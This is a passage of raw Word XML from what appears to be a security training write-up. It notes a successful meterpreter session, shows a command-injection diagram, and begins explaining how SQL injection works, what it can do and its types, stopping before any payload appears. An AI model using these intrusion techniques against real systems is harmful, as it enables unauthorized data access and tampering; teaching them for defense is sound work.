          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> session 3!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306B699E" w14:textId="50E1CA77" w:rsidR="00F12781" w:rsidRDefault="00F12781" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12781">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F8338C" wp14:editId="3696C3C9">
            <wp:extent cx="5562600" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1987852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62600" cy="3019425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C536EB7" w14:textId="77777777" w:rsidR="00461395" w:rsidRPr="00833676" w:rsidRDefault="00461395" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CA8F3B" w14:textId="43BD32D2" w:rsidR="00461395" w:rsidRPr="00833676" w:rsidRDefault="00461395" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00833676">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">DIAGRAMATIC DEMO OF COMMAND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00833676">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>INJECTION:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0C68555C" w14:textId="51FDEBC1" w:rsidR="00461395" w:rsidRPr="00F12781" w:rsidRDefault="00D0159D" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="154A19F1" wp14:editId="22EE8636">
            <wp:extent cx="4333875" cy="3276600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="67175895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758951" name="Picture 2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33875" cy="3276600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEAAC66" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63577949" w14:textId="1EB5CA76" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>What is SQL Injection (SQL) and How to Prevent It</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4C115" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
            <w:color w:val="FA4216"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>SQL Injection (SQLi)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> is a type of an </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
            <w:color w:val="FA4216"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>injection attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures. They can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4579D427" w14:textId="77777777" w:rsidR="000917AA" w:rsidRPr="00F12781" w:rsidRDefault="000917AA" w:rsidP="00F12781">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Times New Roman" w:hAnsi="Muli" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A3F58DC" w14:textId="1AC40906" w:rsidR="000917AA" w:rsidRPr="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000917AA">
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">How and Why Is an SQL Injection Attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000917AA">
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Performed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5B40B54E" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>To make an SQL Injection attack, an attacker must first find vulnerable user inputs within the web page or web application. A web page or web application that has an SQL Injection vulnerability uses such user input directly in an SQL query. The attacker can create input content. Such content is often called a malicious payload and is the key part of the attack. After the attacker sends this content, malicious SQL commands are executed in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7852D1" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SQL is a query language that was designed to manage data stored in relational databases. You can use it to access, modify, and delete data. Many web applications and websites store all the data in SQL databases. In some cases, you can also use SQL commands to run operating system commands. Therefore, a successful SQL Injection attack can have very serious consequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0E01D5" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Attackers can use SQL Injections to find the credentials of other users in the database. They can then impersonate these users. The impersonated user may be a database administrator with all database privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2768FD0E" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SQL lets you select and output data from the database. An SQL Injection vulnerability could allow the attacker to gain complete access to all data in a database server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C0D02A" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL also lets you alter data in a database and add new data. For example, in a financial application, an attacker could use SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Injection to alter balances, void transactions, or transfer money to their account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE9912" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>You can use SQL to delete records from a database, even drop tables. Even if the administrator makes database backups, deletion of data could affect application availability until the database is restored. Also, backups may not cover the most recent data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E434220" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>In some database servers, you can access the operating system using the database server. This may be intentional or accidental. In such case, an attacker could use an SQL Injection as the initial vector and then attack the internal network behind a firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654C9665" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>There are several types of SQL Injection attacks: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
            <w:color w:val="FA4216"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>in-band SQLi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> (using database errors or UNION commands), </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
            <w:color w:val="FA4216"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>blind SQLi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, and </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
            <w:color w:val="FA4216"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>out-of-band SQLi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>. You can read more about them in the following articles: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
            <w:color w:val="FA4216"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Types of SQL Injection (SQLi)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
            <w:color w:val="FA4216"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Blind SQL Injection: What is it</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632998D" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>To follow step-by-step how an SQL Injection attack is performed and what serious consequences it may have, see: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
            <w:color w:val="FA4216"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>Exploiting SQL Injection: a Hands-on Example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E398F8A" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax" w:cs="Times New Roman"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Maax" w:hAnsi="Maax"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Simple SQL Injection Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21446864" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>The first example is very simple. It shows, how an attacker can use an SQL Injection vulnerability to go around application security and authenticate as the administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58659433" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
